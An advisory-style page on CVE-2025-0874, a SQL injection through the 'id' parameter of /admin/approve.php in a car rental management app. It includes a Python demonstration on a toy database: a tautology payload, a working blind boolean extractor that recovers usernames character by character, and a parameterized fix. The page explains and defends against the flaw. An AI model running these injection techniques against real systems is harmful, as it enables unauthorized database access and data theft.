CVE-2025-0874
Published: 30 January 2025
Description
Adversaries may leverage databases to mine valuable information.
Security Summary
CVE-2025-0874 is a SQL injection vulnerability in code-projects Simple Plugins Car Rental Management version 1.0. VulDB rates the issue critical; its CVSS v3.1 base score of 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) corresponds to Medium severity. The flaw sits in an unidentified function of the file /admin/approve.php, where manipulation of the 'id' argument allows attacker-controlled input to reach a SQL query. It is associated with CWE-74 (improper neutralization of special elements) and CWE-89 (SQL injection). The vulnerability was published on 2025-01-30.
The attack can be launched remotely by an authenticated user with low privileges (PR:L) and requires no user interaction. An attacker who can reach the admin interface with such credentials manipulates the 'id' parameter sent to /admin/approve.php so that the injected text alters the query, which can expose, modify, or disrupt data in the backend database; the vector rates each of confidentiality, integrity, and availability as low impact.
Advisories referenced in VulDB entries (ctiid.294068, id.294068, submit.488538) and a GitHub issue document the vulnerability, noting that an exploit has been publicly disclosed and may be used. Additional context is available from the project site at code-projects.org. No specific patch or mitigation details are outlined in the provided information.
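As an added illustration, not code from the project or from the advisories above, the following Python stand-in models an approve handler that takes an 'id' request parameter the way the advisory describes, shows a tautology and a blind boolean probe against the concatenated query, and then the parameterized fix. The schema, rows, and the table and function names (bookings, users, approve_vulnerable, approve_fixed, blind_probe, extract_username) are constructed assumptions; the real approve.php is PHP and its query text is not shown on this page.

```python
"""Added example, not code from Simple Plugins Car Rental Management: a toy
approve handler with the SQL injection bug class from CVE-2025-0874 beside a
parameterized fix. Schema, rows and names are constructed assumptions."""
import re
import sqlite3

# Constructed sample data: a minimal bookings table plus a users table that the
# approve action should never expose.
SCHEMA = """
CREATE TABLE bookings (id INTEGER PRIMARY KEY, customer TEXT, status TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO bookings VALUES (1, 'alice', 'pending'), (2, 'bob', 'pending'), (3, 'carol', 'pending');
INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
"""


def fresh_db():
    """New in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def approved_ids(conn):
    """Ids of all bookings currently marked approved, ascending."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM bookings WHERE status='approved' ORDER BY id")]


def approve_vulnerable(conn, booking_id):
    """Hypothetical vulnerable handler: the 'id' parameter is concatenated into
    the statement, so any SQL inside the parameter is executed as SQL."""
    conn.execute("UPDATE bookings SET status='approved' WHERE id=" + booking_id)
    conn.commit()
    return approved_ids(conn)


def parse_booking_id(value):
    """Accept only a plain decimal integer; anything else is rejected (None)."""
    if not isinstance(value, str) or re.fullmatch(r"[0-9]+", value) is None:
        return None
    return int(value)


def approve_fixed(conn, booking_id):
    """Hardened handler: validate the type, then bind the value as a query
    parameter so the database driver never parses it as SQL text.
    Returns None when the parameter is rejected (a real handler would answer
    400 and log the attempt)."""
    bid = parse_booking_id(booking_id)
    if bid is None:
        return None
    conn.execute("UPDATE bookings SET status='approved' WHERE id=?", (bid,))
    conn.commit()
    return approved_ids(conn)


def blind_probe(conn, condition):
    """Boolean-based probe through the vulnerable handler: booking 1 is approved
    only if the attacker-supplied 'condition' is true, so the visible approval
    state becomes a one-bit oracle for arbitrary subqueries."""
    approved = approve_vulnerable(conn, "1 AND (" + condition + ")")
    conn.execute("UPDATE bookings SET status='pending' WHERE id=1")  # reset for the next probe
    conn.commit()
    return 1 in approved


def extract_username(conn, row_id, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=16):
    """Recover users.username one character at a time using only the oracle
    above: an UPDATE-only sink still leaks data from other tables."""
    name = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "(SELECT substr(username,%d,1) FROM users WHERE id=%d)='%s'" % (pos, row_id, ch)
            if blind_probe(conn, cond):
                name += ch
                break
        else:
            break  # no character matched: end of the string
    return name


if __name__ == "__main__":
    print("legitimate id:", approve_vulnerable(fresh_db(), "2"))        # [2]
    print("tautology:", approve_vulnerable(fresh_db(), "1 OR 1=1"))     # [1, 2, 3]
    print("blind read of users.username:", extract_username(fresh_db(), 1))  # admin
    print("fixed, legitimate id:", approve_fixed(fresh_db(), "2"))      # [2]
    print("fixed, payload rejected:", approve_fixed(fresh_db(), "1 OR 1=1"))  # None
```

The fix combines two independent controls: input validation that rejects anything but a decimal id, and parameter binding so that even a value that slips past validation is never interpreted as SQL. Either one alone closes this particular payload; both together are the pattern to apply across every handler in the admin area, since the advisory does not say approve.php is the only affected sink.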
Details
- CWE(s): CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')), CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
Affected Products
- code-projects Simple Plugins Car Rental Management 1.0
MITRE ATT&CK Enterprise Techniques
- T1190 Exploit Public-Facing Application
- T1213.006 Data from Information Repositories: Databases
Why these techniques?
The SQL injection in the public-facing web application (/admin/approve.php) is reached remotely over the network by an authenticated low-privileged user, which is exploitation of a public-facing application (T1190), and it lets that user run attacker-controlled SQL against the backend database, enabling unauthorized querying, leakage, modification, or deletion of stored data (T1213.006).